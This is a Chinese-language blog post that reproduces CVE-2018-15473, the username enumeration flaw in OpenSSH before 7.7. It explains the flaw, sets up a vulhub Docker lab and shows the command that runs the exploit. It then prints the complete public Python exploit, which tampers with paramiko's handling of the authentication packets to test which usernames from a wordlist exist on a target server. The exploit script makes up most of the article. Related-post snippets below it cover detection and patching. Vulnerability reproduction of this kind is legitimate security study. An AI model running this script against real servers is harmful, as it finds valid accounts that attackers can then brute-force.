OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现

最新推荐文章于 2024-04-17 09:35:13 发布
最新推荐文章于 2024-04-17 09:35:13 发布
阅读量9k 收藏 12
点赞数 5
分类专栏: 漏洞复现 文章标签: OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/119322342
版权

OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现

一、漏洞描述

OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。

攻击者可以尝试使用格式错误的数据包(例如,截断的数据包)对用户进行身份验证,并且:

  • 如果用户无效(不存在),则 userauth_pubkey()立即返回,服务器发送 SSH2_MSG_USERAUTH_FAILURE到攻击者;
  • 如果用户有效(它存在),则 sshpkt_get_u8() 失败,服务器调用 fatal() 并关闭与攻击者的连接。

二、漏洞影响

OpenSSH < 7.7

三、漏洞复现

1、环境搭建

cd vulhub/openssh/CVE-2018-15473
docker-compose build
docker-compose up -d

2、漏洞复现

使用CVE-2018-15473-Exploit枚举字典中的用户名:

python3 exp.py --port 22 --userList exampleInput.txt x.x.x.x

得到结果:
在这里插入图片描述

四、漏洞POC

#!/usr/bin/env python
###########################################################################
#                ____                    _____ _____ _    _               #
#               / __ \                  / ____/ ____| |  | |              #
#              | |  | |_ __   ___ _ __ | (___| (___ | |__| |              #
#              | |  | | '_ \ / _ \ '_ \ \___ \\___ \|  __  |              #
#              | |__| | |_) |  __/ | | |____) |___) | |  | |              #
#               \____/| .__/ \___|_| |_|_____/_____/|_|  |_|              #
#                     | |               Username Enumeration              #
#                     |_|                                                 #
#                                                                         #
###########################################################################
# Exploit: OpenSSH Username Enumeration Exploit (CVE-2018-15473)          #
# Vulnerability: CVE-2018-15473                                           #
# Affected Versions: OpenSSH version < 7.7                                #
# Author: Justin Gardner, Penetration Tester @ SynerComm AssureIT         #
# Github: https://github.com/Rhynorater/CVE-2018-15473-Exploit            #
# Email: Justin.Gardner@SynerComm.com                                     #
# Date: August 20, 2018                                                   #
###########################################################################

import argparse
import logging
import paramiko
import multiprocessing
import socket
import string
import sys
import json
from random import randint as rand
from random import choice as choice
# store function we will overwrite to malform the packet
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]

# list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target
# with these 3 random usernames (there is an almost 0 possibility that they can be real ones)
random_username_list = []
# populate the list
for i in range(3):
    user = "".join(choice(string.ascii_lowercase) for x in range(rand(15, 20)))
    random_username_list.append(user)

# create custom exception
class BadUsername(Exception):
    def __init__(self):
        pass

# create malicious "add_boolean" function to malform packet
def add_boolean(*args, **kwargs):
    pass

# create function to call when username was invalid
def call_error(*args, **kwargs):
    raise BadUsername()

# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler
def malform_packet(*args, **kwargs):
    old_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    result  = old_parse_service_accept(*args, **kwargs)
    #return old add_boolean function so start_client will work again
    paramiko.message.Message.add_boolean = old_add_boolean
    return result

# create function to perform authentication with malformed packet and desired username
def checkUsername(username, tried=0):
    sock = socket.socket()
    sock.connect((args.hostname, args.port))
    # instantiate transport
    transport = paramiko.transport.Transport(sock)
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        # server was likely flooded, retry up to 3 times
        transport.close()
        if tried < 4:
            tried += 1
            return checkUsername(username, tried)
        else:
            print('[-] Failed to negotiate SSH transport')
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
    except BadUsername:
            return (username, False)
    except paramiko.ssh_exception.AuthenticationException:
            return (username, True)
    #Successful auth(?)
    raise Exception("There was an error. Is this the correct version of OpenSSH?")

# function to test target system using the randomly generated usernames
def checkVulnerable():
    vulnerable = True
    for user in random_username_list:
        result = checkUsername(user)
        if result[1]:
            vulnerable = False
    return vulnerable

def exportJSON(results):
    data = {"Valid":[], "Invalid":[]}
    for result in results:
        if result[1] and result[0] not in data['Valid']:
            data['Valid'].append(result[0])
        elif not result[1] and result[0] not in data['Invalid']:
            data['Invalid'].append(result[0])
    return json.dumps(data)

def exportCSV(results):
    final = "Username, Valid\n"
    for result in results:
        final += result[0]+", "+str(result[1])+"\n"
    return final

def exportList(results):
    final = ""
    for result in results:
        if result[1]:
            final+="++++++" + result[0] + " is a valid user!\n"
        else:
            final+=result[0]+" is not a valid user!\n"
    return final

# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error

# get rid of paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address")
arg_parser.add_argument('--port', type=int, default=22, help="The target port")
arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used")
arg_parser.add_argument('--outputFile', type=str, help="The output file location")
arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location")
group = arg_parser.add_mutually_exclusive_group(required=True)
group.add_argument('--username', type=str, help="The single username to validate")
group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through")
args = arg_parser.parse_args()

def main():
    sock = socket.socket()
    try:
        sock.connect((args.hostname, args.port))
        sock.close()
    except socket.error:
        print('[-] Connecting to host failed. Please check the specified host and port.')
        sys.exit(1)

    # first we run the function to check if host is vulnerable to this CVE
    if not checkVulnerable():
        # most probably the target host is either patched or running a version not affected by this CVE
        print("Target host most probably is not vulnerable or already patched, exiting...")
        sys.exit(0)
    elif args.username: #single username passed in
        result = checkUsername(args.username)
        if result[1]:
            print(result[0]+" is a valid user!")
        else:
            print(result[0]+" is not a valid user!")
    elif args.userList: #username list passed in
        try:
            f = open(args.userList)
        except IOError:
            print("[-] File doesn't exist or is unreadable.")
            sys.exit(3)
        usernames = map(str.strip, f.readlines())
        f.close()
        # map usernames to their respective threads
        pool = multiprocessing.Pool(args.threads)
        results = pool.map(checkUsername, usernames)
        try:
            if args.outputFile:
                outputFile = open(args.outputFile, "w")
        except IOError:
            print("[-] Cannot write to outputFile.")
            sys.exit(5)
        if args.outputFormat=='json':
            if args.outputFile:
                outputFile.writelines(exportJSON(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in JSON form.")
            else:
                print(exportJSON(results))
        elif args.outputFormat=='csv':
            if args.outputFile:
                outputFile.writelines(exportCSV(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in CSV form.")
            else:
                print(exportCSV(results))
        else:
            if args.outputFile:
                outputFile.writelines(exportList(results))
                outputFile.close()
                print("[+] Results successfully written to " + args.outputFile + " in List form.")
            else:
                print(exportList(results))
    else: # no usernames passed in
        print("[-] No usernames provided to check")
        sys.exit(4)

if __name__ == '__main__':
    main()

五、参考链接

https://www.anquanke.com/post/id/157607
https://github.com/Rhynorater/CVE-2018-15473-Exploit

Senimo_
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞CVE-2018-15473
JiangBuLiu的博客
07-09 7806
OpenSSH 用户名枚举漏洞CVE-2018-15473)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现CVE-2018-15473-Exploit Vulnhub官方复现教程 https://vulhub.org/#/environments/openssh/CVE-2018-15473/ 漏洞原理 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用...
cve2018-15473OpenSSH用户名枚举及其检测方法
wdsj_xh的博客
08-14 1242
最新版本OpenSSH服务在接收到畸形的认证请求包时,会根据用户名的存在与否给出不同的响应,由此导致通过SSH服务枚举服务器的用户名。 ssh-check-username.py 使用说明 安装依赖包 pip install paramiko==2.0.8 语法:python ssh_checkusername.py ip username –port 22 脚本 #!/usr/bin/...
OpenSSH用户枚举漏洞poc(CVE-2018-15473
08-24
OpenSSH用户枚举漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
CVE-2018-15473 漏洞复现(ssh用户名枚举
啊酒弟弟的博客
07-13 2447
CVE-2018-15473 漏洞复现(ssh用户名枚举OpenSSH 7.7及之前版本中存在安全漏洞 详细描述:OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH7.7及之前版本中存在安全漏洞,该漏洞源于程序会对有效的和无效的身份验证请求发出不同的响应。攻击者可通过发送特制的...
探索CVE-2018-15473 Exploit:网络安全中的一个关键工具
最新发布
gitblog_00033的博客
04-17 393
探索CVE-2018-15473 Exploit:网络安全中的一个关键工具 项目地址:https://gitcode.com/Rhynorater/CVE-2018-15473-Exploit 项目简介 在开源社区中,Rhynorater 创建的一个项目引起了我们的注意,它是一个针对CVE-2018-15473漏洞的利用代码库,链接如下:https://gitcode.com/Rhynorater...
OpenSSH 用户枚举漏洞(CVE-2018-15473)修复
热门推荐
huryer的专栏
01-04 2万+
OpenSSH 用户枚举漏洞(CVE-2018-15473) 1、漏洞描述 漏洞名称 OpenSSH 用户枚举漏洞(CVE-2018-15473)【原理扫描】 详细描述 : OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻...
CVE-2018-15473漏洞修复-离线版
weixin_45918954的博客
02-20 1337
通过 find / -name libcrypto.so.3 和 libssl.so.3 查找到对应so文件的位置,并建立软连接。(可能下面的ssh.pam文件都没用到,因为sshd_config配置文件貌似没使用它,请自行测试。根据漏扫建议升级OpenSSH-7.8已经修复这个安全问题,我想不如干脆升级到8.8p1版本算了。OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的。根据原ssh配置文件,修改新生成的配置文件/etc/ssh/sshd_config。
CVE-2018-15473(ssh用户名枚举漏洞复现遇到的问题
Xshihao的博客
03-07 437
paramiko库运行脚本出错解决办法
【vulhub】openssh CVE-2018-15473漏洞复现
qq_58873970的博客
09-06 577
ssh工作机制:服务器启动的时候自己产生一个密钥(768bit公钥),本地的ssh客户端发送连接请求到ssh服务器,服务器检查连接点客户端发送的数据和IP地址,确认合法后发送密钥(768bits)给客户端,此时客户端将本地私钥(256bit)和服务器的公钥(768bit)结合成密钥对key(1024bit),发回给服务器端,建立连接通过key-pair数据传输。
OpenSSH--CVE-2018-15473
haha1314的博客
07-15 2025
OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 利用docker坏境 环境启动后,我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p20022,输入密码vulhub,即可登录到容器中。 漏洞复现 使用CVE-201...
CVE-2018-15473-Exploit-master
12-19
CVE-2018-15473-Exploit-master验证脚本
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473CVE-2018-15919)修补文件命令
03-31
通过升级opensshOpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2018-15473OpenSSH用户枚举漏洞
1stPeak's Blog
06-07 2582
CVE-2018-15473复现笔记 影响版本 该影响自1999年以来至今年7.7版本中所有版本,远程攻击者可利用漏洞猜测在OpenSSH服务器上注册的用户名 POC链接 https://github.com/1stPeak/CVE-2018-15473 POC环境配置 git clone hhttps://github.com/1stPeak/CVE-2018-15473.git cd CVE-2018-15473 #注意:如果您在kali上安装,则可以跳过pip安装;paramiko已经在那里。 .
SSH用户枚举漏洞CVE-2018-15473)原理学习
weixin_30915275的博客
08-24 1329
一、漏洞简介 1、漏洞编号和类型 CVE-2018-15473 SSH 用户名(USERNAME)暴力枚举漏洞 2、漏洞影响范围 OpenSSH 7.7及其以前版本 3、漏洞利用方式 由于SSH本身的认证机制存在缺陷,导致攻击者可以使用字典,暴力枚举SSH存在的用户名(Username) 4、漏洞修复方式 升级openssh 二、漏洞原理及其利用分析 1、漏洞原理 参考国外文献:...
OpenSSH 安全漏洞(CVE-2018-15473)
08-04
OpenSSH 安全漏洞(CVE-2018-15473)是一个影响OpenSSH版本小于7.7的漏洞。要复现这个漏洞,可以按照以下步骤进行操作: 1. 首先,需要搭建漏洞环境。可以使用vulhub提供的Docker镜像来搭建环境。具体的操作命令如下: ``` cd vulhub/openssh/CVE-2018-15473 docker-compose build docker-compose up -d ``` 2. 接下来,需要替换密钥文件。首先备份原有的密钥文件,可以使用以下命令进行备份: ``` cp -r /usr/local/openssh/etc /usr/local/openssh/etc.bak ``` 然后,将旧版SSH密钥文件替换为新的密钥文件,可以使用以下命令进行替换: ``` cp /etc/ssh/ssh_host_* /usr/local/openssh/etc ``` 3. 如果旧版本是通过源码安装的OpenSSH,建议备份整个openssh目录。可以使用以下命令进行备份: ``` mv /usr/local/openssh /usr/local/openssh.old ``` 这样就完成了OpenSSH安全漏洞(CVE-2018-15473)的复现。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值